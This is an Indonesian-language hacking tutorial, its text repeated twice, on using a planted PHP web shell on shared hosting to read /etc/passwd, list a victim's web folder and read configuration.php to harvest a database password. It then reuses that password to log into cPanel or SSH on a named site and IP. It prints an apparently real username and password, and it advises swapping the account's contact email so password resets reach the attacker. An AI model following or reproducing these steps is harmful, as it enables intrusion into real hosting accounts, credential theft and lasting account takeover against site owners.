Halo Halo Dan Halo Ahhahaha ;D
mari kita cari CPANEL login dan SSH dari inject
cari cpanel login dan ssh dari inject 0000-00-00 00:00:00
For the first time nih gw kasih tutor ....
ya dah deh langsung aja kita mulai
barang ato apa aja yg perlu disiapin nih ...
1. Komputer dgn koneksi internet.
2. Phpshell
3. Kesabaran
4. Doa tentunya
5. Rokok juga jangan lupa ma secangkir Kopi
pertama kita buka phpshell ato target injek kita ...
saya ambil contoh utk site ini
http://www.abm.no/
langkah pertama :
cat /etc/passwd <--- guna nya buat tau jumlah user yg ada disana ....
contoh :
langkah kedua ....
pilih salah satu user ...
contoh :
/home/monalisa <-- aku pilih ini ...
dan masuk ke folder public_html ...
/home/monalisa/public_html
langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu
contoh:
ls -al dari /home/monalisa/public_html
langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php
contoh:
dalam kasus ini file yg ada adalah configuration.php jadi kita cat configuration.php
hasilnya :
pass na adalah $mosConfig_password = ´jqUf#(l´;
langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh ...
setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya
caranya ketik /dns <site target> di Mirc or my teacher is google
contoh:
[15:02] * Dns resolving www.abm.no
-
[15:02] * Dns resolved www.abm.no to 62.70.54.76
dari situ kita mendapat kan ip server 62.70.54.76
utk login cpanel kita bisa menggunakan http://<ip server>:2082
dalam hal ini http://62.70.54.76:2082
setelah itu kita masukan username dan pass ....
utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa
jadi utk login kita masukan
username:monalisa
password:jqUf#(l
dan anda tlah masuk kedalam cpanel nya ...
Note:
1. Tidak smua user mempunyai cpanel ato ssh ... ini dapat kita lihat dari cat /etc/passwd
tandanya : /usr/local/cpanel/bin/jailshell <--- berarti user ini memiliki cpanel dan shell
tapi jika : /bin/false <-- tandanya cpanel nya dia tidak punya ato shellna.
2. Beberapa server sudah mulai pintar menyembunyikan pass mreka ... salah satu trik utk medapat kan pass mreka coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya disembunyikan.
3. satu saran dari saya setelah kamu masuk ke cpanel jangan merubah password mereka tapi rubah aja contact information masukan email kalian disana dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian
udah dulu ye capek gw ngetiknya (Ngetik Apa Copas Hayo) wkakkaka :D ....
mari kita cari CPANEL login dan SSH dari inject
cari cpanel login dan ssh dari inject 0000-00-00 00:00:00
For the first time nih gw kasih tutor ....
ya dah deh langsung aja kita mulai
barang ato apa aja yg perlu disiapin nih ...
1. Komputer dgn koneksi internet.
2. Phpshell
3. Kesabaran
4. Doa tentunya
5. Rokok juga jangan lupa ma secangkir Kopi
pertama kita buka phpshell ato target injek kita ...
saya ambil contoh utk site ini
http://www.abm.no/
langkah pertama :
cat /etc/passwd <--- guna nya buat tau jumlah user yg ada disana ....
contoh :
ok ...agerhus:32050:32051::/home/lagerhus:/usr/local/cpanel/bin/jailshell
ltngrupp:32051:32052::/home/ltngrupp:/usr/local/cpanel/bin/jailshell
melodin:32054:32055::/home/melodin:/usr/local/cpanel/bin/jailshell
monalisa:32055:32056::/home/monalisa:/usr/local/cpanel/bin/jailshell
sandvika:32056:32057::/home/sandvika:/usr/local/cpanel/bin/jailshell
storvilt:32057:32058::/home/storvilt:/usr/local/cpanel/bin/jailshell
supercup:32058:32059::/home/supercup:/usr/local/cpanel/bin/jailshell
langkah kedua ....
pilih salah satu user ...
contoh :
/home/monalisa <-- aku pilih ini ...
dan masuk ke folder public_html ...
/home/monalisa/public_html
langkah ke tiga coba kalian ls -al dan perhatikan saut2 nama file itu
contoh:
ls -al dari /home/monalisa/public_html
dari sini kita bisa liat bahwa user monalisa menggunakan mambo ...344337 drwxr-x--- 27 monalisa nobody 4096 Aug 29 09:31 .
5718289 drwx--x--x 11 monalisa monalisa 4096 Aug 29 09:53 ..
344348 -rw-r--r-- 1 monalisa monalisa 690 May 11 02:14 .htaccess
344088 -rwxr-xr-x 1 monalisa monalisa 56216 Feb 26 2006 CHANGELOG.php
344354 -rwxr-xr-x 1 monalisa monalisa 3429 Feb 26 2006 COPYRIGHT.php
344351 -rwxrwxrwx 1 monalisa monalisa 1122 Jul 20 18:18 INSTALL.php
344342 -rwxrwxrwx 1 monalisa monalisa 17977 Sep 17 2005 LICENSE.php
10240263 drwxrwxrwx 9 monalisa monalisa 4096 Dec 15 2005 administrator
4194486 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 bancorotto
8176127 drwxr-xr-x 9 monalisa monalisa 4096 Mar 24 14:00 bilder
9846992 drwxrwxrwx 2 monalisa monalisa 4096 Dec 21 2005 bilder_old
4194627 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 byrakrat
32993 drwxrwxrwx 2 monalisa monalisa 4096 May 30 13:04 cache
4194623 drwxrwxrwx 16 monalisa monalisa 4096 Feb 22 2006 cafebeirut
5095694 drwxrwxrwx 2 monalisa monalisa 4096 Oct 1 2005 cgi-bin
180461 drwxrwxrwx 25 monalisa monalisa 4096 May 31 12:00 components
344140 -rwxr-xr-x 1 monalisa monalisa 2852 Jul 25 12:06 configuration.php
344141 -rwxr-xr-x 1 root root 2855 Jul 17 17:52 configuration.php~
4194484 drwxrwxrwx 16 monalisa monalisa 4096 Aug 22 15:18 davinci
langkah ke empat yaitu baca file yg bernama configuration.php ato config.php ato db.php
contoh:
dalam kasus ini file yg ada adalah configuration.php jadi kita cat configuration.php
hasilnya :
ok dari sini kita bisa mendapat pass dari user tersebut$mosConfig_live_site = ´http://www.monalisahuset.no´;
$mosConfig_locale = ´no_NO´;
$mosConfig_mailer = ´mail´;
$mosConfig_mailfrom = ´post@monalisahuset.no´;
$mosConfig_ml_support = ´0´;
$mosConfig_multipage_toc = ´1´;
$mosConfig_offline = ´0´;
$mosConfig_offline_message = ´This site is down for maintenance.<br /> Please check back again soon.´;
$mosConfig_offset = ´-2´;
$mosConfig_offset_user = ´0´;
$mosConfig_pagetitles = ´1´;
$mosConfig_password = ´jqUf#(l´;
pass na adalah $mosConfig_password = ´jqUf#(l´;
langkah ke lima mengetahui bagaimana cara utk login ke dalam cpanel ato ssh ...
setelah kita mendapat kan passwordnya kita coba utk login ke cpanel nya
caranya ketik /dns <site target> di Mirc or my teacher is google
contoh:
[15:02] * Dns resolving www.abm.no
-
[15:02] * Dns resolved www.abm.no to 62.70.54.76
dari situ kita mendapat kan ip server 62.70.54.76
utk login cpanel kita bisa menggunakan http://<ip server>:2082
dalam hal ini http://62.70.54.76:2082
setelah itu kita masukan username dan pass ....
utk username kita dapat dari cat /etc/passwd dan dalam kasus ini user yg kita pake adalah monalisa
jadi utk login kita masukan
username:monalisa
password:jqUf#(l
dan anda tlah masuk kedalam cpanel nya ...
Note:
1. Tidak smua user mempunyai cpanel ato ssh ... ini dapat kita lihat dari cat /etc/passwd
tandanya : /usr/local/cpanel/bin/jailshell <--- berarti user ini memiliki cpanel dan shell
tapi jika : /bin/false <-- tandanya cpanel nya dia tidak punya ato shellna.
2. Beberapa server sudah mulai pintar menyembunyikan pass mreka ... salah satu trik utk medapat kan pass mreka coba kalian baca index.php ato admin.php disana akan di cantumkan letak dimana user name dan password nya disembunyikan.
3. satu saran dari saya setelah kamu masuk ke cpanel jangan merubah password mereka tapi rubah aja contact information masukan email kalian disana dan klo pass udah dirubah tinggal reset password dan pass na akan kekirim ke email kalian
udah dulu ye capek gw ngetiknya (Ngetik Apa Copas Hayo) wkakkaka :D ....
